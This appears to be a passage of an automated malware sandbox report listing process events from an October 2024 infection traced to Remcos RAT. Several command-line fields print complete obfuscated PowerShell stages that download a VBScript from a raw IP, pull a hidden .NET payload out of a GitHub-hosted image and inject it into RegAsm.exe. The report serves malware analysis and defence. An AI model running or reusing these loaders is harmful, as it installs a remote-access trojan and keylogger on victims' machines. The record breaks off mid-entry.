IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:05:05:51
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:05:05:53
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                                                                                                                                                                              Imagebase:0x13f530000
                                                                                                                                                                              File size:2'758'280 bytes
                                                                                                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:05:05:53
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:05:05:57
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                                                                                                                                                                              Imagebase:0xfff40000
                                                                                                                                                                              File size:168'960 bytes
                                                                                                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:05:05:58
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:05:06:00
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:05:06:02
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                              Imagebase:0x13ffa0000
                                                                                                                                                                              File size:13'824 bytes
                                                                                                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:05:06:05
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:05:06:07
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:05:06:09
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:05:06:10
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                                                                                                                                                                              Imagebase:0x13f6b0000
                                                                                                                                                                              File size:2'758'280 bytes
                                                                                                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:05:06:10
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
                                                                                                                                                                              Imagebase:0x13f5e0000
                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:05:06:13
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:25
                                                                                                                                                                              Start time:05:06:13
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:05:06:14
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
                                                                                                                                                                              Imagebase:0xd90000
                                                                                                                                                                              File size:64'704 bytes
                                                                                                                                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:27
                                                                                                                                                                              Start time:05:06:14
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                                                                                                                                                                              Imagebase:0xff340000
                                                                                                                                                                              File size:168'960 bytes
                                                                                                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:05:06:15
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                              Imagebase:0x13fdc0000
                                                                                                                                                                              File size:443'392 bytes
                                                                                                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:05:06:17
                                                                                                                                                                              Start date:14/10/2024
